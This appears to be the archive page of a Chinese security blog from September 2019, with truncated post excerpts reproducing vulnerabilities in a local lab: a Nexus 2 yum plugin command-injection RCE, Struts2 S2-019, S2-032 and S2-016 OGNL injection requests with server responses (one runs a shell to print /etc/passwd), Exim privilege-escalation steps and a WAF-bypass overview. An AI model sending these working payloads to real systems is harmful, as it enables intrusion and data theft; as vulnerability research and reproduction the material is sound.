September 23, 2019
CVE-2019-5475 Nexus2 yum插件RCE漏洞复现 <!–more–> 参考资料 【漏洞分析】CVE-2019-5475:Nexus 2 yum插件远程命令执行漏洞 https://mp.weixin.qq.com/s/E_BEp-yYKtIYAnQ6JP7fmg CVE-2019-5475:Nexus2 yum插件RCE漏洞复现 https://mp.weixin.qq.com/s?__biz=MzA4NzUwMzc3NQ==&mid=2247483738&idx=1&sn=6bce2bf153ab0a07c01f746d479644d4&scene=0#wechat_redirect 环境搭建 (以 windows 为例) 1 下载 Nexus-2.14.13 https://download.sonatype.com/nexus/oss/nexus-2.14.13-01-bundle.zip 2 (管理员权限)运行 bin/jsw/windows-x86-64/install-nexus.bat 3 (管理员权限)运行 bin/jsw/windows-x86-64/start-nexus.bat 【启动速度比较慢请耐心等待】 调试参考 https://blog.csdn.net/nthack5730/article/details/51082270 4 访问 http://localhost:8081/nexus 验证服务是否启动 (默认密码 admin/admin123) PoC 漏洞需要管理员权限,属于 after-auth RCE / 后台 getshell。 一个 tasklist 的 demo C:\\Windows\\System32\\cmd.exe /c C:\\Windows\\System32\\tasklist.exe & 原始 HTTP 请求 PUT /nexus/service/siesta/capabilities/00014aeb0e511dc9 […]
September 12, 2019
Struts2 S2-019 HTTP raw text <!–more–> 检测请求 POST /example/HelloWorld.action HTTP/1.1 Host:192.168.198.133:80 Accept-Language: zh_CN User-Agent: Auto Spider 1.0 Accept-Encoding: gzip, deflate Connection: close Content-Length: 492 Content-Type: application/x-www-form-urlencoded debug=command&expression=%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22struts2_security_%22),%23resp.getWriter().print(%22check%22),%23resp.getWriter().flush(),%23resp.getWriter().close()HTTP/1.1 200 Set-Cookie: JSESSIONID=339037A73494B91A16B5EC3974F956EC; Path=/; HttpOnly Content-Type: text/plain;charset=ISO-8859-1 Transfer-Encoding: chunked Date: Thu, 12 Sep 2019 07:42:15 GMT Connection: close 16 struts2_security_check 0 利用请求 POST /example/HelloWorld.action HTTP/1.1 Host:192.168.198.133:80 Accept-Language: zh_CN […]
September 12, 2019
某道全版本rce漏洞分析 <!–more–> https://xz.aliyun.com/t/6239
September 12, 2019
Struts S2-032 HTTP raw text <!–more–> 正文 分析 [](http://wp.blkstone.me/wp-content/uploads/2019/09/s2_032_20190912.png "s2-032") 探测请求 POST / HTTP/1.1 Cookie: SessionId=96F3F15432E0660E0654B1CE240C4C36 User-Agent: Java/1.8.0_212 Host: 192.168.198.133:8888 Accept: text/html, image/gif, image/jpeg, *; q=.2, /; q=.2 Connection: keep-alive Content-type: application/x-www-form-urlencoded Content-Length: 209 method%3a%23_memberAccess%3d@ognl.OgnlContext+@DEFAULT_MEMBER_ACCESS%2c%23kxlzx%3d+@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2c%23kxlzx.println%2888888888-1%29%2c%23kxlzx.close HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 9 Date: Thu, 12 Sep 2019 04:07:32 GMT 88888887 OGNL method:#_memberAccess=@ognl.OgnlContext+@DEFAULT_MEMBER_ACCESS,#kxlzx=+@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#kxlzx.println(88888888-1),#kxlzx.close 利用请求 POST […]
September 11, 2019
Struts S2-016 HTTP Raw TEXT <!–more–> 利用请求 POST /login.action HTTP/1.1 Cookie: SessionId=96F3F15432E0660E0654B1CE240C4C36 User-Agent: Java/1.8.0_212 Host: 192.168.198.133 Accept: text/html, image/gif, image/jpeg, *; q=.2, /; q=.2 Connection: keep-alive Content-type: application/x-www-form-urlencoded Content-Length: 651 redirect:%24%7B%23resp%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%28new+java.lang.ProcessBuilder(new+java.lang.String[]{‘/bin/sh’,’-c’,’cat+/etc/passwd’})).start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23dis%3Dnew+java.io.DataInputStream%28%23b%29%2C%23buf%3Dnew+byte%5B20000%5D%2C%23dis.read%28%23buf%29%2C%23msg%3Dnew+java.lang.String%28%23buf%29%2C%23dis.close%28%29%2C%23resp.getWriter%28%29.println%28%23msg.trim%28%29%29%2C%23resp.getWriter%28%29.flush%28%29%2C%23resp.getWriter%28%29.close%28%29%7D= HTTP/1.1 200 OK Server: nginx/1.12.2 Date: Wed, 11 Sep 2019 07:07:30 GMT Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: JSESSIONID=E251191A83A1CD97EE09BD19BC45A877-n1; Path=/ Content-Language: zh-CN 679 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin […]
September 11, 2019
CVE-2019-0788 微软远程桌面客户端远程任意代码执行漏洞 <!–more–> 正文 mstsc 客户端连接 恶意 rdp 服务端时可能被服务端远程执行代码。 用途 内网钓鱼 蜜罐反打 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0788 https://www.tenable.com/blog/microsofts-september-2019-patch-tuesday-tenable-roundup
September 11, 2019
CVE-2019-1003000 Jenkins RCE PoC or simple pre-auth remote code execution on the Server <!–more–> 正文 https://medium.com/@valeriyshevchenko/jenkins-rce-poc-or-simple-pre-auth-remote-code-execution-on-the-server-d18b868a77cb
September 9, 2019
WAF攻防研究之四个层次Bypass WAF <!–more–> 摘要 WAF攻防研究之四个层次Bypass WAF 绕过WAF的相关技术研究是WAF攻防研究非常重要的一部分,也是最有趣的部分,所以我在写WAF攻防时先写攻击部分。还是那句老话“不知攻焉知防”,如果连绕过WAF方法都不知道,怎么保证WAF能保护后端服务的安全。在我看来,WAF的绕过技术的研究将不断驱动防御水平提高。 以前一些WAF bypass的文章更像CASE的整理,都把焦点放在了规则对抗层面。绕过WAF规则,更像是正面对抗,属于下策。一直关注规则层面的绕过,太局限视野,看不到WAF在其他方面问题。木桶原理,防御能力并不会有本质的提高。本文将从4个层次讲解bypass WAF的技术,全方位提升WAF的防御能力。 讲完相关攻击技术后,以后再探讨WAF的设计架构、防御策略,这样显得每一处的考虑都是有意义的。 从架构层Bypass WAF 。 从资源限角度bypass WAF。 从协议层面bypass WAF。 从规则缺陷bypass WAF。 参考资料 https://weibo.com/ttarticle/p/show?id=2309404007261092631700&display=0&retcode=6102
September 6, 2019
CVE-2019-10149 Exim 本地权限提升 LPE <!–more–> 正文 git clone https://github.com/dhn/exploits docker build -t vuln/cve-2019-10149 . docker run –rm -it vuln/cve-2019-10149 测试过程 team@blackloutus01 >>> ~/develop/vulhub-master/exploits/CVE-2019-10149 > master > sudo su [sudo] password for team: [root@blackloutus01 CVE-2019-10149]# docker run –rm -it vuln/cve-2019-10149 No directory, logging in with HOME=/ $ cd /tmp $ vim sh $ cat /tmp/sh #!/usr/bin/env […]
September 5, 2019
内网渗透中的定向思路 <!–more–> 正文 17、内网渗透测试定位技术总结 https://blog.csdn.net/Fly_hps/article/details/80644179